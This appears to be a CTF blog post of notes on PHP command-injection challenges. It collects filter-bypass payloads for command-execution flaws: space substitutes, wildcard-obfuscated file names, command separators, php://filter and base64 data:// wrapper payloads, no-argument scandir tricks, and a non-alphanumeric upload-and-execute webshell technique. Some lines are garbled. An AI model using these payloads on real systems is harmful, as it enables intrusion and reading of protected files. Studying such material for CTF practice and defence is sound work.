Some miscellaneous notes on CTF command execution vulnerabilities
Command execution vulnerabilities are mainly caused by functions such as system, exec, shell_exec, eval, etc., which can execute the content entered by the user as a command. The general function of backticks is similar to that of the system, and the content is executed as a command. //But in these command execution functions, only system has an echo, and other functions need to be used with echo
Some notes on filtering
Generally, I will use echo "npfs "; include($_GET['url']); ?>&url=php://filter/read=convert.base64-encode/resource=flag.php
this to try the water directly when I see it.
eval(system('cat flag.php');
The system of this code can be replaced by backticks. If cat is filtered, you can replace cat with other functions that can view flag.php. For example nl
, if flag.php is also filtered, flag.php can be separated and spliced. For example f''l''a''g.php
, wildcards f*
orf?ag.php
Some ways to bypass
Space bypass
> < <> 重定向符//这里有一点需注意用<>的时候和通配符?是没有回显的可以用\
//比如 tac<>fla?.php要改为tac<>fla\g.php
%09(需要php环境)
${IFS}
$IFS$9
{cat,flag.php} //用逗号实现了空格功能
%20
%09
/**/(一般在sql注入的时候使用)
cat is filtered
more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看
file -f:报错出具体内容
grep
strings
Use of grep
grep test *file #在当前目录中,查找后缀有 file 字样的文件中包含 test 字符串的文件,并打印出该字符串的行
Functions without parentheses (php)
echo qwer;
print qwe;
die;
include "/dasdasda";
require "/asdasdas";
include_once "/asdasd";
require_once "/aaaaaa";
The two agreements I often use
php://filter/
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZioiKTs=
Try these two when the above items are not available
What if you still can't get out
https://www.cnblogs.com/NPFS/p/13778333.html
Go and see this no-parameter file reading written by the big guy
After reading it, you can know the magical effect of scandir(current(localeconv())) (I have to say that it’s really convenient to see the world on the shoulders of giants like me
Hey here is a question that can use this
This question is that after all the above methods are tried, they are useless and then scandir(current(localeconv())) is used to view the file.
print_r(scandir(current(localeconv())));
After seeing flag.php, we want to open it, but what should we do if the number cannot appear.
Of course, it is to reverse the array through array_reverse, and then use the next() function to read the next value, remember to successfully read the flag.php file
paylaodshow_source(next(array_reverse(scandir(pos(localeconv())))));
If other functions are spliced behind or in front of the input content of the command execution function to affect our execution content, you can use the command separator
; //分号
| //只执行后面那条命令
|| //只执行前面那条命令
& //两条命令都会执行
&& //两条命令都会执行
%0a
Other operations
Because Linux commands can be used with wildcards, if a lot of things are filtered, you can use this feature to bypass
<?php
// 你们在炫技吗?
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c);
}
}else{
highlight_file(__FILE__);
}
This can use /bin/base64 to view the flag
such asc=/???/????64%20????.???
There is also the improvement of the non-alphanumeric webshell learned from God P
Mainly use the shell to execute arbitrary scripts, and Linux file names support global wildcards instead
The default file name we upload is /tmp/phpxXXXXXX The last six characters of the file are random uppercase and lowercase letters
Use wildcards [@-[]
to represent capital letters
<?php
// 你们在炫技吗?
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c);
}
}else{
highlight_file(__FILE__);
}
So open
Follow the method of God
- First construct a POST upload file package
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>POST文件上传</title>
</head>
<body>
<form action="http://17d01aae-51d9-48fe-abfb-d9ba10037d72.chall.ctf.show/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接-->
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>
-
Upload a php file
#!/bin/sh ls
-
Just
c=./???/????????[@-[]
add it after grabbing the bag
There is a trick to round up numbers
${_}=""`
`$((${_}))=0`
`$((~$((${_}))))=-1
Use this to make up the number we want